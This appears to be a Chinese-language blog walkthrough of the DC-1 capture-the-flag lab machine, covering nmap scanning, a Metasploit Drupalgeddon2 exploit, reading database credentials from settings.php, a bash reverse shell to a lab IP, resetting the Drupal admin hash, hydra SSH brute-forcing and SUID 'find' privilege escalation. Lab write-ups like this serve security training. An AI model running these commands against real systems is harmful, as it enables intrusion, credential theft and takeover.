当前位置: 首页 > article >正文

渗透测试实战-DC-1

firewall-cmd –reload


DC-1 靶机实战

打开测试靶机DC-1

查看网络配置,及网卡

靶机使用NAT 模式,得到其MAC地址

使用nmap 工具扫描内网网段

nmap -sP 192.168.1.144/24 -oN nmap.Sp

MAC 对照得到其IP地址

对其详细进行扫描

nmap -A 192.168.1.158 -p 1-65535 -oN nmap.A

可以看到其80 22 端口都是开放的

80端口下,我们可以看到其网站的模板为:Drupal 7

22   爆破

80   drupal    CMS

国外三大PHP CMS 之一

drupal

wordpress

joomla

80端口开放,我们可以使用浏览器直接访问IP地址

MSF

通过使用MSF 直接搜索该网站模板存在的漏洞

启动

msfconsole

search drupal

使用该攻击模块

通过查看References来查看该漏洞的详细信息;

References:

  https://cvedetails.com/cve/CVE-2018-7600/

  https://www.drupal.org/sa-core-2018-002

  https://greysec.net/showthread.php?tid=2912

  https://research.checkpoint.com/uncovering-drupalgeddon-2/

  https://github.com/a2u/CVE-2018-7600

  https://github.com/nixawk/labs/issues/19

  https://github.com/FireFart/CVE-2018-7600

选择攻击载荷

set payload php/meterpreter/reverse_tcp

缺少目标地址,源地址

添加

set RHOSTS 192.168.1.158

set LHOST 192.168.1.150

攻击

拿到shell

flag1

Every good CMS needs a config file - and so do you.

这句话 指引我们,应该去找的该网站的配置文件

所在目录:

sites/default/

flag2

cat sites/default/settings.php

'database' => 'drupaldb',

'username' => 'dbuser',

'password' => 'R0ck3t',

'host' => 'localhost',

shell

进入交互式界面

尝试进行数据库连接

mysql -udbuser -pR0ck3t

连接失败

考虑反弹shell

反弹shell

本地监听2333端口

nc -lvvp 2333

bash -i >& /dev/tcp/192.168.1.150/2333 0>&1

直接反弹失败

借助python 反弹

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@DC-1:/var/www/sites/default$ bash -i >& /dev/tcp/192.168.1.150/2333 0>&1

反弹成功

登录数据库

尝试在反弹shell 下执行连接数据库

还是失败了

但是我们发现有意思的事情,我们在kali 本机的python 交互式环境下可以成功连接到数据库

www-data@DC-1:/var/www/sites/default$ mysql -udbuser -pR0ck3t

登入成功

进入数据库drupladb

查询users数据表

select * from users\G

重置后台管理员密码

重置admin 用户密码

这里我们破解admin 用户密码要耗费时间,我们可以考虑重置admin 用户密码,使用drupal 自带脚本重新生成密码。

php scripts/password-hash.sh admin

password: admin                 hash: $S$D9/EB/sN8TEfNaCZ74SqGVO0xxuOe/8fZI3LCOMVXSOqiqfNDwDt

更新users

update users set pass="$S$D9/EB/sN8TEfNaCZ74SqGVO0xxuOe/8fZI3LCOMVXSOqiqfNDwDt" where uid=1;

更新成功

flag3

提示我们 etc/passwd

flag4

可以看到我们的flag4 用户是可以登录的

接下来我们使用hydra 爆破,该用户密码

hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.158 ssh -vV -f -o hydra.ssh

我们进入/root 家目录,发现没有权限

是否有一些命令具有SUID 标志

find / -perm -4000 2>/dev/null

利用操作系统内核提权

mkdir

find GGG -exec "whoami" \;

find GGG -exec "/bin/sh" \;

测试完成



http://www.kler.cn/a/468772.html

相关文章:

  • 【论文+源码】基于Spring和Spring MVC的汉服文化宣传网站
  • Visual studio code编写简单记事本exe笔记
  • 【ArcGISPro/GeoScenePro】检查多光谱影像的属性并优化其外观
  • 【shell编程】报错信息:Non-zero Exit Status(包含7种解决方法)
  • Python入门系列之九-数据分析与可视化进阶
  • 旧服务改造及微服务架构演进
  • 力扣23.合并K个升序链表
  • MySQL 主从同步模式选择指南
  • 大模型与EDA工具
  • Pytorch库结构是什么样的
  • C语言冒泡排序教程简介
  • Viggle AI:支持小孩或者卡通人物吗? [Viggle AI实战教程] – 第2篇
  • Go语言的 的垃圾回收(Garbage Collection)基础知识
  • 统计学就业方向(ai)
  • 基于51单片机智能温控风扇设计—数码管显示
  • >>>、/deep/、::v-deep、::v-deep()和:deep()的区别与用法
  • 【cursor破解】【cursor白嫖】
  • 英文词汇解析:“Arguably“ 的用法与含义
  • ClearerVoice-Studio人声分离模型本地部署
  • 【python因果库实战15】因果生存分析4
  • Mongo高可用架构解决方案
  • 新零售模式下开源AI智能名片2+1链动模式S2B2C商城小程序源码的应用研究
  • MLP、CNN、Transformer 的区别解析
  • 如何在 Hive SQL 中处理复杂的数据类型?
  • fiddler抓包的基本使用和浏览器抓包
  • 零基础也能建站: 使用 WordPress 和 US Domain Center 轻松五步创建网站 (无需编程)